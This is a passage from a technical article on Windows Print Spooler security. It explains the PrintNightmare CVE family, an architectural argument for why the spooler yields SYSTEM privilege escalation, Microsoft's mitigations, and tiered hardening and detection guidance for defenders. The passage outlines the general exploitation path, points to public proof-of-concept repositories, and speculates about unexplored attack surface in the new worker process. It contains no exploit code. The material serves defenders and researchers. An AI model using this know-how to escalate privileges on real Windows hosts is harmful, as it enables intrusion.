&lt;h3&gt;7.4 The Composition Pattern&lt;/h3&gt;
&lt;p&gt;WPP and Universal Print can run on the same client. A managed enterprise endpoint can use Universal Print for its enrolled shared printers (cloud-mediated) and WPP for its locally-discovered printers (driverless local stack). Microsoft&apos;s documented stance is that this composition is the long-term direction. The WPP FAQ&apos;s &quot;at a future date&quot; language about default-on [@ms-wpp-faq] and the third-party-driver end-of-servicing milestones [@ms-end-of-servicing] together sketch a 2027-and-after world: WPP locally, Universal Print for cloud-enrolled printers, legacy stack restricted to specialty hosts that explicitly opt out.&lt;/p&gt;

A complete migration to Universal Print would force every Windows user to require Microsoft 365 entitlements and continuous network connectivity to print. That is a price Microsoft has not been willing to ask the global Windows install base to pay. WPP is the answer for endpoints that print locally; Universal Print is the answer for endpoints that print to enrolled shared printers; the parallel-stack architecture is the answer to the union. As of June 2026, no Microsoft document announces a date at which the local stack will be removed.
&lt;p&gt;The composed architecture in one picture:&lt;/p&gt;

flowchart LR
    subgraph EP[&quot;Managed Windows endpoint&quot;]
        APP[&quot;User application&quot;]
        WIN[&quot;winspool.drv&quot;]
        SPL[&quot;spoolsv.exe&quot;]
        WORKER[&quot;Spooler Worker&lt;br /&gt;restricted token&quot;]
        UPCLI[&quot;Universal Print client&quot;]
    end
    subgraph CLD[&quot;Microsoft 365 cloud&quot;]
        UPSVC[&quot;Universal Print service&lt;br /&gt;MPSIPPService&quot;]
        CONN[&quot;Optional on-prem connector&quot;]
    end
    subgraph LOC[&quot;Locally discovered printers&quot;]
        IPP[&quot;Mopria / IPP printer&quot;]
        SPEC[&quot;Specialty printer&lt;br /&gt;(opt-out path)&quot;]
    end
    APP --&amp;gt; WIN
    WIN --&amp;gt; SPL
    SPL --&amp;gt; WORKER
    WORKER --&amp;gt; IPP
    SPL -. opt-out .-&amp;gt; SPEC
    APP --&amp;gt; UPCLI
    UPCLI --&amp;gt; UPSVC
    UPSVC --&amp;gt; CONN
    CONN --&amp;gt; IPP
&lt;p&gt;Two answers, deliberately. We promised in section 1 that we would not tell you which one to deploy. We are keeping that promise. The next section is about why no third answer covers the gap.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: The Architectural Impossibility Argument&lt;/h2&gt;
&lt;p&gt;We can state the architectural-impossibility claim formally now. It is bounded, it has been bounded for fifteen years on this artifact, and it is sharp enough to act on.&lt;/p&gt;
&lt;h3&gt;8.1 The Three-Conjunct Primitive&lt;/h3&gt;
&lt;p&gt;Any local service that simultaneously satisfies three conditions exposes a SYSTEM code-execution primitive by construction:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;(a) accepts low-privilege RPC,&lt;/li&gt;
&lt;li&gt;(b) loads caller-influenced third-party DLLs as part of those requests, and&lt;/li&gt;
&lt;li&gt;(c) runs at SYSTEM context.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The primitive is independent of any particular implementation bug. Particular implementation bugs are how the primitive is exercised. The primitive itself is what makes those bugs exploitable.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Any local service that simultaneously accepts low-privilege RPC, loads caller-influenced DLLs, and runs at SYSTEM context exposes a SYSTEM code-execution primitive by construction. No patch on individual entry points can close the class. The class is closed only by breaking one of the three conjuncts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The argument is not an empirical generalization. It is a structural one. Given (a), (b), and (c), the attacker&apos;s path to SYSTEM-execution is a finite search problem: enumerate the entry points that load DLLs, find one whose DLL-load arguments the attacker can steer, supply an attacker-supplied DLL. The defender&apos;s only options are to remove one of the conjuncts. Patching individual entry points moves the search problem; it does not eliminate it. The 2021-2024 patch cascade is the empirical record of that move-but-not-eliminate dynamic.&lt;/p&gt;
&lt;h3&gt;8.2 The Three Exits&lt;/h3&gt;
&lt;p&gt;Each shipped architectural approach breaks exactly one conjunct.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Break (c), the SYSTEM context.&lt;/strong&gt; PrintIsolationHost.exe shipped in 2009 as a partial answer: drivers can run in a sibling process, but that sibling process is itself LocalSystem by default [@ms-printer-driver-isolation]. WPP&apos;s Spooler Worker (2024) is more complete: a restricted token, below SYSTEM integrity level, for the bulk of per-user spooler operations [@ms-wpp-more-info].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Break (b), the caller-influenced DLL load.&lt;/strong&gt; WPP module blocking (2024) refuses to load anything except Microsoft-signed binaries required for IPP [@ms-wpp-more-info]. The conjunct is no longer &quot;loads caller-influenced DLLs&quot;; it is &quot;loads only Microsoft-signed DLLs the OS shipped.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Break (a), the low-privilege RPC entry.&lt;/strong&gt; Universal Print (2021) removes the local &lt;code&gt;\PIPE\spoolss&lt;/code&gt; endpoint from the endpoint&apos;s surface [@ms-universal-print-whatis]. The CERT/CC 2021 mitigation -- stop and disable the Spooler service -- is the same architectural exit with larger collateral damage (no local printing at all) [@cert-vu-383432].&lt;/p&gt;
&lt;h3&gt;8.3 What No Exit Covers&lt;/h3&gt;
&lt;p&gt;The intersection of constraints that no shipped exit covers: specialty printers that require v3 or v4 drivers, on a host that needs offline printing, on a non-managed endpoint, in an environment that cannot adopt cloud printing. Industrial label printers, secure check printers, and healthcare imaging devices are the canonical examples [@ezeep-label-printers-wpp]. This intersection is the empirical gap that justifies the parallel-stack answer in 2026 and the absence of a default-on commitment for WPP [@ms-wpp-faq].&lt;/p&gt;
&lt;h3&gt;8.4 The Argument as a Lower Bound&lt;/h3&gt;
&lt;p&gt;The three-conjunct argument is a &lt;em&gt;lower bound on bug class&lt;/em&gt;, not a &lt;em&gt;security analysis&lt;/em&gt;. It says the architectural primitive cannot be made safe without breaking one of the conjuncts. It does not say that a specific implementation of an exit is itself secure. WPP could ship a bug. The Microsoft-signed module loader could have a parser vulnerability. The Spooler Worker process could be coerced into elevation through some intermediate IPC channel; that channel is itself a research question we return to in section 9.4. The architectural argument bounds what &lt;em&gt;kind&lt;/em&gt; of bugs are still possible. It does not promise that no bugs will be.&lt;/p&gt;

The &quot;service that loads caller-influenced code in a privileged context produces a privilege-escalation primitive by construction&quot; pattern predates Windows. The capability-systems literature of the 1970s -- Hydra, KeyKOS, and the related work that gave us Mandatory Integrity Control as a Windows feature decades later -- worked through the same argument in different language. Confused-deputy attacks (the Hardy formulation) are exactly the case where a privileged process performs an operation on behalf of a less-privileged caller and the operation cashes out at the privileged process&apos;s authority. PrintNightmare is a confused-deputy primitive on `spoolsv.exe`. The architectural exits in section 5 are confused-deputy mitigations: revoke the deputy&apos;s authority (Universal Print breaks delegation entirely), confine what the deputy is willing to do (WPP module blocking), or split the deputy into a privileged broker and an unprivileged worker (WPP Spooler Worker).
&lt;p&gt;Fifteen years of Print Spooler CVEs have produced a single argument with three corollaries. It is not new. It is not Microsoft&apos;s. It has been latent in the academic literature on capability systems since the 1970s. What is new in 2024 is that it shipped, in two flavors, on consumer Windows.&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;Three years after Microsoft shipped the architectural answer, the Print Spooler security story is not complete. We end with five open problems, presented without recommendation.&lt;/p&gt;
&lt;h3&gt;9.1 WPP Adoption Velocity Through the Opt-In Tail&lt;/h3&gt;
&lt;p&gt;No default-on commitment exists. The WPP FAQ uses the verbatim phrase &quot;at a future date&quot; for the default-on flip [@ms-wpp-faq]. As of June 2026, opt-in adoption is reported only anecdotally; Microsoft has not published telemetry. The three published deprecation milestones are real and dated -- January 15, 2026 (no new third-party drivers via Windows Update), July 1, 2026 (Windows IPP class driver preferred over third-party drivers for new printer installs), July 1, 2027 (third-party servicing ends except for security fixes) [@ms-end-of-servicing] -- but they do not equal &quot;WPP is on by default.&quot;&lt;/p&gt;
&lt;p&gt;The Lexmark vendor primary on the WPP transition spells out the operational reading from the printer-OEM perspective: &quot;WPP is disabled by default until 2027... January 2026: no new third-party drivers published via Windows Update; July 2026: Windows defaults to IPP Class Driver when adding devices; July 2027: no updates for third-party drivers except security fixes&quot; [@lexmark-wpp-support]. The OEMs are reading the milestones as a 2027 horizon for the default-on flip. Microsoft has not, in writing, confirmed that reading.&lt;/p&gt;
&lt;p&gt;A negative-search finding sharpens the gap. The trade press that tracks Microsoft security launches (BleepingComputer&apos;s unveil coverage [@bleepingcomputer-wpp-unveil] and its dedicated WPP tag page [@bleepingcomputer-tag-wpp], BornCity&apos;s April 2026 Patch Tuesday print-issues report [@borncity-april-2026-patchday]), the Microsoft Tech Community discussion threads (the 2024 WPP intro discussion [@techcommunity-discuss-msec-print-4008206] and the Ignite 2024 Windows-security companion [@techcommunity-discuss-ignite-2024-4304464]), analyst output (the MPSA member eBook [@mpsa-wpp-ebook], Quocirca&apos;s vendor-published commentary [@computerweekly-quocirca-wpp]) -- none of these surface a quantitative WPP adoption number. Microsoft has not published telemetry, third-party analysts have not estimated it, and OEM disclosures cover hardware compatibility, not enterprise enablement rates. The gap is not a measurement difficulty; it is an absence in the public record.&lt;/p&gt;
&lt;h3&gt;9.2 The Specialty-Printer Gap&lt;/h3&gt;
&lt;p&gt;v3 / v4 driver printers without IPP-class compatibility still exist in production. Industrial label printers, healthcare imaging printers, secure check printers, line-printer holdouts. The honest answer is that these endpoints cannot adopt WPP and cannot adopt Universal Print and they will continue to run a legacy spooler. The defense for them is segmentation, not patching.&lt;/p&gt;
&lt;p&gt;Print Support Apps help bridge some categories. The PSA design guide is the canonical specification [@ms-print-support-app-design-guide]. A walk through the Microsoft Store [@apps-microsoft-store-root] surfaces a sampled (not exhaustive) roster of vendor PSAs available as of June 2026: Brother&apos;s PSA was one of the first to ship [@brother-print-support-app] [@brother-support-page]; Canon Print Assistant covers Canon&apos;s IPP-everywhere subset [@canon-print-assistant-psa]; HP Smart bridges HP&apos;s IPP-everywhere set [@hp-smart-psa]; Konica Minolta&apos;s bizhub PSA covers the bizhub series [@konica-bizhub-psa]; Xerox and Lexmark co-publish a joint PSA [@xerox-lexmark-psa] [@lexmark-wpp-support]. The cloud-print intermediaries ezeep document the operational reality for the categories the PSA model does not cover: industrial label printers (Zebra, Honeywell, SATO, TSC, Dymo) speaking ZPL / EPL are absent from the Mopria-certified IPP-everywhere catalogue and from the Microsoft-Store PSA roster as of June 2026 [@ezeep-label-printers-wpp]. For those vendors the operational guidance is to keep WPP disabled on the affected workstations and to segment them off the production network.&lt;/p&gt;
&lt;h3&gt;9.3 CVE-2024-38198: Attribution and PoC Gap&lt;/h3&gt;
&lt;p&gt;No public researcher is named in any primary source for CVE-2024-38198. No public PoC exists [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. The bug was found, patched, and remained unattributed. This is not necessarily a problem -- silent fixes are normal in vendor patch flow -- but it is a data point: the bug class is still being mined three years after the disclosure event, and the public-research apparatus has not surfaced the next finding.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; CVE-2024-38198, patched on August 13, 2024, has no public researcher attribution and no public PoC as of June 2026 [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. It is the most recent named Print Spooler EoP in the public record. Its existence is the empirical proof point that the legacy spooler is still producing novel CWE-class bugs three years after PrintNightmare.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.4 The spoolsv-to-Spooler-Worker IPC Primitive&lt;/h3&gt;
&lt;p&gt;WPP&apos;s per-user worker model introduces an IPC channel between the parent &lt;code&gt;spoolsv.exe&lt;/code&gt; service and the Spooler Worker process [@ms-wpp-more-info]. Microsoft documents the worker&apos;s restricted token in detail (see the verbatim quote in section 6.1: &quot;no longer runs at SYSTEM IL&quot; [@ms-wpp-more-info] [@ms-wpp-more-info-wayback]) but does not, in public, document the IPC primitive itself. The absence is the load-bearing finding.&lt;/p&gt;
&lt;p&gt;The Windows kernel offers at least four plausible IPC mechanisms that a service like the spooler could use to dispatch work to a per-user worker: an &lt;a href=&quot;https://paragmali.com/blog/every-uac-prompt-is-an-alpc-handshake-a-field-guide-to-windo/&quot; rel=&quot;noopener&quot;&gt;Advanced Local Procedure Call (ALPC)&lt;/a&gt; port, a named pipe (the same family &lt;code&gt;\PIPE\spoolss&lt;/code&gt; is from), a COM activation under RPC, or a shared-memory section with notification. Each has a different attack surface. ALPC ports are not directly named in the filesystem but are reachable through documented APIs; named pipes inherit the SMB and named-pipe-anonymous policy plane [@ms-named-pipes-anonymous] [@ms-restrict-anonymous-named-pipes]; COM-RPC inherits the COM permission DACL surface; shared-memory sections inherit the section-object DACL surface. Per-user services in Windows (the per-user-services framework Microsoft introduced in 1709) typically use ALPC or named pipes for parent / worker dispatch [@ms-per-user-services]. Which mechanism WPP uses, and what authentication the parent demands of the worker (and vice versa), is the specific research question. As of June 2026 it is unanswered in the public record.&lt;/p&gt;
&lt;p&gt;If that channel is itself coercible (TOCTOU on the IPC, redirection-style attacks on a worker named pipe), WPP may exhibit a SpoolFool-class bug at a different layer. Redirection Guard partially answers the obvious junction-following attack on the worker [@msrc-redirectionguard-blog] [@ms-redirection-trust-policy], but the worker has other IPC handles, and the worker&apos;s restricted token still has authority over operations the parent has delegated to it. No public research has surfaced an IPC-channel exploit as of June 2026. The research surface here is real and only loosely mapped.&lt;/p&gt;
&lt;h3&gt;9.5 Detection Signal Coverage for the Post-WPP Era&lt;/h3&gt;
&lt;p&gt;SigmaHQ, Splunk Security Content, Elastic, and Microsoft Defender XDR all ship rules for the PrintNightmare-era event signatures. SigmaHQ&apos;s PrintNightmare rule pack covers the PoC DLL load pattern (&lt;code&gt;win_exploit_cve_2021_1675_printspooler.yml&lt;/code&gt;, rule ID &lt;code&gt;4e64668a-4da1-49f5-a8df-9e2d5b866718&lt;/code&gt;) [@sigma-cve-2021-1675-win-spooler]. The Zeek-on-the-wire DCE-RPC rule (ID &lt;code&gt;7b33baef-2a75-4ca3-9da4-34f9a15382d8&lt;/code&gt;) watches both MS-RPRN&apos;s &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; and MS-PAR&apos;s &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; [@sigma-cve-2021-1675-zeek]. Splunk&apos;s research-team detection on &lt;code&gt;Microsoft-Windows-PrintService/Admin&lt;/code&gt; event code 316 (driver-add) carries the rule ID &lt;code&gt;313681a2-da8e-11eb-adad-acde48001122&lt;/code&gt; and maps to MITRE ATT&amp;amp;CK technique T1547.012 (Print Processors) [@splunk-research-printnightmare-driver] [@splunk-printnightmare-story] [@attack-mitre-t1547-012]. Splunk&apos;s &lt;code&gt;spoolsv.exe&lt;/code&gt;-focused rule pack adds: plug-in loading failure detection (&lt;code&gt;1adc9548-da7c-11eb-8f13-acde48001122&lt;/code&gt;, PrintService Admin Event 808 and security log Event 4909) [@splunk-research-spoolsv-plugin-fail]; &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;Sysmon&lt;/a&gt; Event ID 11 spool-folder DLL writes (&lt;code&gt;347fd388-da87-11eb-836d-acde48001122&lt;/code&gt;) [@splunk-research-spoolsv-dll-sysmon]; Sysmon Event ID 7 loaded-modules signal on &lt;code&gt;spoolsv.exe&lt;/code&gt; (&lt;code&gt;a5e451f8-da81-11eb-b245-acde48001122&lt;/code&gt;) [@splunk-research-spoolsv-loaded-modules]; Sysmon Event ID 10 process-access signal on &lt;code&gt;spoolsv.exe&lt;/code&gt; (&lt;code&gt;799b606e-da81-11eb-93f8-acde48001122&lt;/code&gt;) [@splunk-research-spoolsv-process-access]. Elastic&apos;s prebuilt rule &quot;Unusual Print Spooler Child Process&quot; catches the post-exploit child-process spawn pattern (risk score 47) [@elastic-unusual-printspooler-child]. Azure Sentinel&apos;s KQL hunting query for PrintNightmare watches file creations in the print-spooler drivers folder (&lt;code&gt;C:\WINDOWS\SYSTEM32\SPOOL\drivers&lt;/code&gt;) [@azure-sentinel-printnightmare-yaml].&lt;/p&gt;
&lt;p&gt;Coverage for the WPP era is sparser, and the gap has a specific shape: because WPP has &lt;strong&gt;no in-product audit mode&lt;/strong&gt; -- the &lt;code&gt;ConfigureWindowsProtectedPrint&lt;/code&gt; CSP is the binary two-state setting documented in section 6.4 [@ms-policy-csp-printers] [@tenable-cis-w11-l2] -- pre-enforcement detection has to be synthesized from the existing PrintService Admin and Sysmon event signals (Event 316 driver-adds, 808 / 4909 plug-in failures, Sysmon 7 / 10 / 11 on &lt;code&gt;spoolsv.exe&lt;/code&gt;) plus SCM service-state events (System log Event ID 7036 records spooler service start / stop transitions). Redirection Guard mitigation events appear in &lt;code&gt;Microsoft-Windows-Security-Mitigations/Operational&lt;/code&gt; [@msrc-redirectionguard-blog]. IPC-related signals on the Spooler Worker do not have public detection content as of June 2026. The audit-without-audit-mode pattern is well understood by detection engineers running PrintNightmare content already; the synthesis work to compose it into a WPP rollout-ring playbook is the gap detection content vendors have not yet closed.&lt;/p&gt;
&lt;p&gt;Five open problems. None of them are emergencies. All of them are reasons that a 2026 security program for Print Spooler is still a security program for Print Spooler, not an absence.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide: What a Defender Does in 2026&lt;/h2&gt;
&lt;p&gt;We end with what a Windows administrator with print infrastructure should actually do in 2026. Four tiers, each with its own action list, none of them long.&lt;/p&gt;
&lt;h3&gt;10.1 Tier 1: Managed Enterprise with Cloud Workflows&lt;/h3&gt;
&lt;p&gt;For organizations already on Microsoft 365 with Entra-joined endpoints and cloud-friendly printers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Adopt Universal Print for shared printers [@ms-universal-print-whatis] [@ms-universal-print-getting-started].&lt;/li&gt;
&lt;li&gt;Adopt WPP on a pilot ring of managed endpoints (&lt;code&gt;ConfigureWindowsProtectedPrint = 1&lt;/code&gt;); WPP has no in-product audit mode, so the deployment pattern is rings, not audit-then-enforce [@ms-wpp-enterprises] [@ms-policy-csp-printers] [@tenable-cis-w11-l2].&lt;/li&gt;
&lt;li&gt;Verify Redirection Guard is enabled on &lt;code&gt;spoolsv.exe&lt;/code&gt; [@ms-set-processmitigation] [@ms-redirection-trust-policy].&lt;/li&gt;
&lt;li&gt;Verify the September 2021 default Point-and-Print policy is in force: &lt;code&gt;RestrictDriverInstallationToAdministrators=1&lt;/code&gt; [@kb-5005652-topic].&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;10.2 Tier 2: Managed Enterprise Without Cloud Workflows&lt;/h3&gt;
&lt;p&gt;For organizations with on-prem print infrastructure and no Universal Print appetite:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Deploy WPP to a pilot ring of managed endpoints (&lt;code&gt;ConfigureWindowsProtectedPrint = 1&lt;/code&gt;) and watch &lt;code&gt;Microsoft-Windows-PrintService/Admin&lt;/code&gt; for 30 or more days [@ms-wpp-enterprises] [@ms-policy-csp-printers] [@tenable-cis-server-2025-l2].&lt;/li&gt;
&lt;li&gt;After the pilot, expand the ring to the subset of endpoints whose printers are Mopria-certified [@mopria-certified-products].&lt;/li&gt;
&lt;li&gt;For non-Mopria printers, segment to dedicated print VLANs and enforce the September 2021 admin-only default [@kb-5005652-topic].&lt;/li&gt;
&lt;li&gt;Verify Redirection Guard on &lt;code&gt;spoolsv.exe&lt;/code&gt; on all spooler-bearing hosts [@msrc-redirectionguard-blog].&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;10.3 Tier 3: Specialty, Industrial, Regulated&lt;/h3&gt;
&lt;p&gt;For organizations whose print fleet includes specialty hardware (label printers, secure check printers, healthcare imaging):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Segment Spooler-bearing endpoints onto dedicated VLANs with restricted inbound RPC reachability [@ms-windows-firewall-overview].&lt;/li&gt;
&lt;li&gt;Where possible, enforce the CERT/CC 2021 guidance on domain controllers (Spooler disabled); CISA&apos;s required actions for the same hosts now flow through BOD 22-01 KEV remediation after the January 2026 closure of ED 21-04, but the DC-disabled baseline is unchanged [@cert-vu-383432] [@cisa-ed-21-04].&lt;/li&gt;
&lt;li&gt;Apply the September 2021 admin-only Point and Print default on every host [@kb-5005652-topic].&lt;/li&gt;
&lt;li&gt;Subscribe to MSRC notifications for the affected SKUs [@msrc-cve-2021-34527].&lt;/li&gt;
&lt;li&gt;Plan a multi-year IPP / PSA migration path; track vendor PSA availability [@brother-print-support-app] [@canon-print-assistant-psa] [@hp-smart-psa] [@konica-bizhub-psa] [@xerox-lexmark-psa] [@lexmark-wpp-support] [@ms-print-support-app-design-guide].&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;10.4 Tier 4: Print Server or Domain Controller Specifically&lt;/h3&gt;
&lt;p&gt;For hosts that are themselves print servers or domain controllers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Spooler off where possible. CERT/CC&apos;s 2021 guidance remains in force; CISA closed ED 21-04 in January 2026 and folded its requirements into BOD 22-01 (KEV-catalog remediation), but the practical effect on a domain controller is unchanged [@cert-vu-383432] [@cisa-ed-21-04]. SCM service state-changes appear in the System event log under Event ID 7036 (service start / stop transitions); alert on unexpected &lt;code&gt;Print Spooler&lt;/code&gt; Event 7036 entries on hosts where the service should remain stopped.&lt;/li&gt;
&lt;li&gt;Where Spooler-off is impossible, isolate the host, restrict &lt;code&gt;\PIPE\spoolss&lt;/code&gt; exposure at the firewall, and harden the named-pipe-anonymous policies (&lt;code&gt;RestrictNullSessAccess = 1&lt;/code&gt;; &lt;code&gt;spoolss&lt;/code&gt; absent from &lt;code&gt;NullSessionPipes&lt;/code&gt;) [@ms-restrict-anonymous-named-pipes] [@ms-named-pipes-anonymous] [@ms-ad-firewall-ports].&lt;/li&gt;
&lt;li&gt;Log MS-RPRN and MS-PAR calls; alert on &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; and &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; invocations from non-administrator SIDs [@sigma-cve-2021-1675-zeek]. The canonical event-log signals to instrument are: PrintService Admin Event ID 316 (driver-add) [@splunk-research-printnightmare-driver]; PrintService Admin Event ID 808 (spooler plug-in load failure) paired with security log Event ID 4909 [@splunk-research-spoolsv-plugin-fail]; Sysmon Event ID 7 (loaded modules on &lt;code&gt;spoolsv.exe&lt;/code&gt;) [@splunk-research-spoolsv-loaded-modules]; Sysmon Event ID 10 (process access on &lt;code&gt;spoolsv.exe&lt;/code&gt;) [@splunk-research-spoolsv-process-access]; Sysmon Event ID 11 (spool-folder DLL writes under &lt;code&gt;C:\WINDOWS\SYSTEM32\SPOOL\drivers&lt;/code&gt;) [@splunk-research-spoolsv-dll-sysmon] [@azure-sentinel-printnightmare-yaml].&lt;/li&gt;
&lt;li&gt;Confirm Redirection Guard is enabled on &lt;code&gt;spoolsv.exe&lt;/code&gt; and watch &lt;code&gt;Microsoft-Windows-Security-Mitigations/Operational&lt;/code&gt; for mitigation events [@msrc-redirectionguard-blog].&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; CISA Emergency Directive 21-04, issued July 13, 2021, mandated that federal civilian agencies stop and disable the Print Spooler service on Active Directory domain controllers [@cisa-ed-21-04]. CISA closed ED 21-04 in January 2026 and transitioned its required actions to BOD 22-01 (Reducing the Significant Risk of Known Exploited Vulnerabilities). The compliance vehicle changed; the operational outcome did not. Agencies that have not adopted Universal Print on their DC infrastructure should still keep Spooler stopped and disabled on every DC.&lt;/p&gt;
&lt;/blockquote&gt;

For detection engineers, the named-rule packs to start from are: SigmaHQ `4e64668a-4da1-49f5-a8df-9e2d5b866718` (PrintService Admin Event 808 PoC DLL-load failure) [@sigma-cve-2021-1675-win-spooler]; SigmaHQ `7b33baef-2a75-4ca3-9da4-34f9a15382d8` (Zeek DCE-RPC wire-level driver install) [@sigma-cve-2021-1675-zeek]; Splunk story `fd79470a-da88-11eb-b803-acde48001122` (PrintNightmare analytic story, production status) [@splunk-printnightmare-story]; Splunk research `313681a2-da8e-11eb-adad-acde48001122` (PrintService Admin Event Code 316 driver-add) [@splunk-research-printnightmare-driver]; Elastic prebuilt rule &quot;Unusual Print Spooler Child Process&quot; (EQL, risk 47) [@elastic-unusual-printspooler-child]; Azure Sentinel hunting query `8f404352-c4ff-44d1-8d70-c50ee2fad8f8` (DeviceFileEvents in spool drivers folder) [@azure-sentinel-printnightmare-yaml]. Jacob Baines&apos;s DEF CON 29 &quot;Bring Your Own Print Driver Vulnerability&quot; [@defcon-29-baines-pdf] and the companion `concealed_position` repository [@baines-concealed-position] are the canonical reference for the BYOV attack class, which detection rule packs for installed-driver behavior also need to model.
&lt;p&gt;The unifying pattern across the tiers: enforce the September 2021 default, enable Redirection Guard, audit WPP on the way to enforcement, and segment what cannot be migrated. The architectural answer to PrintNightmare exists. The operational answer is to use it.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. The press attached the name to a sequence. CVE-2021-1675 (June 8, 2021) was originally classed as a local EoP, then silently reclassified to RCE on June 21 [@nvd-cve-2021-1675] [@bleepingcomputer-domain-takeover]. CVE-2021-34527 (July 1, 2021) was the separate-bulletin out-of-band assignment for the RCE primitive Sangfor&apos;s PoC actually exploited [@nvd-cve-2021-34527] [@cert-vu-383432]. CVE-2021-34481 (July 15, 2021) was a related local EoP fixed in KB5005652 [@nvd-cve-2021-34481] [@kb-5005652-topic]. CVE-2021-36958 (September 14, 2021) was the next-cycle Print Spooler RCE [@nvd-cve-2021-36958]. Several adjacent bugs (CVE-2022-21999 SpoolFool, CVE-2024-38198) are often called &quot;PrintNightmare-class&quot; without being assigned the name themselves [@nvd-cve-2022-21999] [@wiz-cve-2024-38198].

The proof-of-concept that triggered the disclosure event on June 29, 2021 was written by Zhiniang Peng, Xuefeng Li, and Lewis Lee at Sangfor Technology for their Black Hat USA 2021 briefing &quot;Diving Into Spooler&quot; [@infocondb-bh2021-sangfor] [@afwu-wayback-snapshot]. They published it briefly believing the bug had been patched on June 8; the patch turned out to cover only the synchronous MS-RPRN entry point [@nvd-cve-2021-1675]. A second variant against the asynchronous MS-PAR `RpcAsyncAddPrinterDriver` was published shortly after by the researcher `@cube0x0` [@cube0x0-cve-2021-1675] [@cert-vu-383432]. The CERT/CC disclosure-norms advisory VU#383432 was a separate document by Will Dormann about the disclosure failure itself, not the bug [@cert-vu-383432].

No. SpoolFool (CVE-2022-21999, disclosed February 8, 2022 by Oliver Lyak / `@ly4k_` of SafeBreach Labs) is a Print Spooler local privilege escalation that abuses the printer `SpoolDirectory` registry value and NTFS reparse points, classified as CWE-59 (Link Following) [@nvd-cve-2022-21999] [@ly4k-spoolfool]. Win32k is the GUI subsystem and is uninvolved. The researcher handle is `@ly4k_` with a trailing underscore; `@jonas_lyk` is a distinct researcher.

No, and it is not from March 2024 either. CVE-2024-38198 (August 13, 2024 Patch Tuesday) is a Print Spooler Elevation of Privilege Vulnerability classified as CWE-345 Insufficient Verification of Data Authenticity [@wiz-cve-2024-38198] [@rapid7-cve-2024-38198]. Exploitation requires winning a race, but the CWE is 345, not 362, and Microsoft did not name Point and Print as the affected component. CVSS v3.1 base 7.5 (`AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`) [@wiz-cve-2024-38198]. No public PoC and no public researcher attribution exist as of June 2026.

Because the third-party printer-driver install base assumes drivers are loaded into a LocalSystem-context process. Sandboxing the spooler would break compatibility with the v3 and v4 driver model that the entire pre-2024 printer install base ships against [@ms-printer-driver-isolation] [@ms-print-spooler-architecture]. Microsoft&apos;s chosen architectural exits (Windows Protected Print Mode and Universal Print) sidestep the constraint by either restricting which DLLs the spooler will load (WPP module blocking plus the lower-privilege Spooler Worker) or removing the local spooler from the workflow entirely (Universal Print) [@ms-wpp-more-info] [@ms-wpp-canonical] [@ms-universal-print-whatis].

For endpoints that print only through Universal Print and where the local Spooler service is disabled, yes. The `\PIPE\spoolss` RPC entry point is not exposed and the architectural primitive is broken [@ms-universal-print-whatis] [@ms-universal-print-getting-started]. Most enterprise deployments are mixed (Universal Print for some workflows, local Spooler for others), in which case the PrintNightmare risk surface is reduced but not eliminated. Universal Print does not automatically disable the local Spooler.

We can find no record of one. The Sangfor &quot;Diving Into Spooler&quot; talk on August 4, 2021 at Black Hat USA 2021 is the canonical primary-source talk for the technique [@infocondb-bh2021-sangfor]. Jacob Baines&apos;s DEF CON 29 (August 2021) talk &quot;Bring Your Own Print Driver Vulnerability&quot; is a related contemporary talk worth citing if you have heard the Giakouminakis attribution and are trying to track down its source [@defcon-29-baines-pdf] [@baines-concealed-position].
The Sangfor Black Hat USA 2021 session record (presenters, time, abstract) is preserved on InfoconDB at `infocondb.org/con/black-hat/black-hat-usa-2021/diving-into-spooler-discovering-lpe-and-rce-vulnerabilities-in-windows-printer` [@infocondb-bh2021-sangfor]. Jacob Baines&apos;s DEF CON 29 slides are mirrored at `media.defcon.org/DEF CON 29/DEF CON 29 presentations/Jacob Baines - Bring Your Own Print Driver Vulnerability.pdf` [@defcon-29-baines-pdf], and the companion `concealed_position` GitHub repository documents the four-CVE driver exploit set (ACIDDAMAGE / RADIANTDAMAGE / POISONDAMAGE / SLASHINGDAMAGE) [@baines-concealed-position].

&lt;p&gt;&amp;lt;StudyGuide slug=&quot;print-spooler-three-generations-of-printnightmare&quot; keyTerms={[
  { term: &quot;spoolsv.exe&quot;, definition: &quot;The Windows Print Spooler API server, running as LocalSystem, that loads third-party Print Provider, Print Processor, and printer driver DLLs into its address space. The architectural protagonist of every named Print Spooler CVE 2010-2024.&quot; },
